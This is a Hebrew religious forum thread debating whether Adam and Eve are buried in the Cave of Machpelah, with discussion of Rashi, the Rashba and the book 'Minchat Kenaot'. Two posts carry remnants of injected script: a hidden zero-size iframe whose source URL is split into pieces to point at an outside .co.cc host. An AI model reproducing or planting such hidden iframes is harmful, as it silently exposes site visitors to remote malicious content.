בית פורומים עצור כאן חושבים

אדם וחוה במערת המכפלה: אמונות ודעות ודגם התנהגות

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-31/10/2018 11:52 לינק ישיר 
נמדשיר

מיימוני כתב:
 אשכול.

דדווח על תוכן פוגעני

נשלח ב-31/10/2018 16:59 לינק ישיר 

נמדשיר

איקון ירוק של תודה.

הספר הוא "מנחת קנאות". אי אפשר להורידו בישראל משום מה.

ובכן, חומר הרקע זמין, פחות או יותר, כדי לדון בויכוח הזה ומה הוא מלמד אותנו.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-31/10/2018 20:22 לינק ישיר 
נמדשיר

מיימוני כתב:

הספר הוא "מנחת קנאות". אי אפשר להורידו בישראל משום מה.

אם אתה רוצה להוריד אותו תתקין את הסייר OPERA ותפעיל את האופציה של VPN וכך תוכל לראות ברור את הספר.
אני שולח לך קישור לסייר OPERA.
אגב בספר הזה יש הרבה פרקים  מעניינים שאם נקבל אותם אפשר לסגור את  הפורום עצכ"ח , היות והמנחת קנאות שם מאריך בפרקים אחד לאחד נגד שיטת הפורם ומצאתי שם אסמכתא גדןלה לצורת החשיבה שלי הן בנושא האמונה והן בנושא יחוד השם שכידוע  .
ר ישראל רובין ומיימוני
תודה לכם שעל ידי ר ישראל שהביא ציטוט מהספר ועל ידי מיימוני שהסתקרן למצוא את הספר  זכיתי  לראות את הספר הזה .
הוא מאוד מעניין אותי ואני צריך לקרוא אותו הרבה שם יש את דעת האמת לכל נושאי הפורום שברור שדעתו נגד צורת החשיבה של הפורום ונכתב בשפה פשוטה וברורה .
אני מודה לבורא עולם שזיכה אותי להגיע לספר הנ"ל דרך הפורם .

למי שיש מכשיר אנדרואיד יכול להכנס לאותו סייר ולראות שם הוראות איך לעיין בספר דרך המכשיר .

וזה מה שנאמר על רבי מאיר  תוכו אכל קליפתו זרק .

יש שם עוד נושאים על הבנת התורה שבארץ ישראל שכמובן יש לשנות את שיטת הלימוד מהישיבות בחוץ לארץ כדי לקבל את השגת ארץ ישראל .
בקיצור הספר מתוק מדבש בשבילי .ושוב תודה לכל הגורמים שהביאו אותי לגלות את הספר.

ברור שדרך הקישור ששלחתי קל לקרוא את הטקסט.

אבל הרי הפורום הוא כדעת המו"נ לכן תשאיר את הפורום בשבילם אבל מי שדעתו כדעת הראשונים והקבלה  אין לא מה לדון בפורום על דברים פשוטים .
היות ואחד מצצט מו"נ ואחד מצטט רשב"א .ומקובלים

scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תוקן על ידי נמדשיר ב- 31/10/2018 21:13:34

דדווח על תוכן פוגעני

נשלח ב-1/11/2018 04:34 לינק ישיר 
נמדשיר

למען האמת את הספר לא ראיתי אבל ראיתי כמה תשובות של הרשבא והבנתי את דעתו בענין הספר לא חידש לי דברים שלא ידעתי אלא הספר הביא לי את הידיעה שהרשבא כתב זאת במפורש בצורה ברורה את כל הפרטים שאין לי צורך לכתוב וגם יש לדעה שלי מקור כתוב אני בגלל ההשגות שלי מתנגד לפילוסופיה ואני מבין שלוגית אי אפשר להוכיח על אלוקים דרך פילוסופיה ושמחתי לראות שהדברים כתובים בצורה מפורשת וברורה. קראתי מספיק פילוסופיה כדי לדעת שאין להשיג את האמת דרכם עד שפניתי לקבלה וברוך השם עזרו לי משמים להשיג את הקבלה בצורה טובה מאוד לכן אני מרשה לעצמי ללכת בגדולות אגב אני לא חפשתי הוכחות בפילוסופיה כי הלכתי תמיד עם אמונה אני חפשתי להשיג את הנהגתו ואת אחדותו של בורא עולם ולהשיג את ענין הידיעה והבחירה שאין סתירה לא דרך הבנה אלא להבין שזה יתכן אצל בורא עולם ללא סתירה וגם רציתי להבין בגדול בדיוק את שלוש הנקודות שכותב הרשבא שיש לדעת לכן הגישה שלי בלימוד הפילוסופיה היתה שונה כי היא באה מתוך אמונה ורצון להבין ולא רצון להוכיח את ענין אחדות הבורא. בצעירותי חשבתי שההוכחה הפילוסופית בפרט של חובת הלבבות היא הוכחה ברורה עד שגדלתי והבנתי שלוגית לא ניתן להוכיח דבר שלא משיגים והענין עמוק מאוד שהרי רואים שירעבם עבד עבודה זרה אפילו שדיבר עם הקב"ה. מיימוני הצלחתי להוריד את הספר ל PDF לא דרך הכפתור שלהם אלא באפשרות שגוגל נותן להוריד

תוקן על ידי נמדשיר ב- 01/11/2018 04:45:18

דדווח על תוכן פוגעני

נשלח ב-1/11/2018 14:37 לינק ישיר 

ר' מיימוני, יש"כ על הפירוט הרב, אבל מתוך כך נדמה שלא שמת לב לכמה פרטים קטנים . 

רש"י אינו מזכיר מי הקבורים שם, אלא שכפולה בזוגות, ועל השאלה המתבקשת אםאדם וחווה לא קבורים שם למה נקראת כבר אז מכפלה, היישוב פשוט, שהיא נקראת כך היום אף שאז לא נקראה כך. לדוגמא, כיכר רבין, יתכן היום אדם או עיתון שיספר על איאוע שהתרחש לפני ארבעים שנה בכיכר רבין ולא יציין שבזמן האירוע היה שמה שונה.

זאת בנוסף לעניין העקרוני עצמו,  שהוזכר גם באשכול שהפנת אליו. כשרש"י בא לפרש פירוש מילולי אין ענינו לערוך מחקר הסטורי אם זה מתיישב לפיו. כאן נכתבה המילה מכפלה ובחז"ל הובאו שתי דעות, רש"י שלא היתה לו סיבה לשונית או מילולית להעדיף דעה אחת על השנייה, הביא את שתיהן.

דדווח על תוכן פוגעני

נשלח ב-1/11/2018 15:01 לינק ישיר 

מערת המכפלה בנויה קומה על קומה מערה מוכפלת.

דדווח על תוכן פוגעני

נשלח ב-2/11/2018 03:28 לינק ישיר 
נראה לי שיש כאן תשובות לא רעות..

ועיקרו שהמכפלה היא ביטוי למקום שיש בו בנין שתי קומות.
וע"ש שהיו כבר חצובים בסלע מקומות קבורה מוכנים
אמנם זה חידוש מאד מקורי (של הרבי מליובוויץ) אבל מתיישב יפה

(מספרו של הרב יחזקאל סופר מעיני רש"י
נמצא גם באוצר החכמה אך זה צולם ישירות מהספר)
יש המשך שם למי שמעונין בניני קבלה חסידות וכו'

תוקן על ידי yossiw ב- 02/11/2018 04:11:17

דדווח על תוכן פוגעני

נשלח ב-2/11/2018 03:32 לינק ישיר 
המשך

תוקן על ידי yossiw ב- 02/11/2018 03:33:30

דדווח על תוכן פוגעני

נשלח ב-2/11/2018 03:35 לינק ישיר 
המשך3

דדווח על תוכן פוגעני

נשלח ב-2/11/2018 03:36 לינק ישיר 
המשך4

דדווח על תוכן פוגעני

נשלח ב-2/11/2018 03:37 לינק ישיר 
המשך5

דדווח על תוכן פוגעני

נשלח ב-2/11/2018 03:38 לינק ישיר 
המשך 6

דדווח על תוכן פוגעני

נשלח ב-2/11/2018 03:39 לינק ישיר 
המשך 7

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > אדם וחוה במערת המכפלה: אמונות ודעות ודגם התנהגות
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 סך הכל 2 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. בקטגוריית דת ואמונה אתם מוזמים להיכנס ולדון על כל נושא שעולה לכם בקשר לדת היהודית. שו''ת בנושאי הלכה, פרשנות לתורה ולמקרא, גאולה, אחרית הימים ועוד.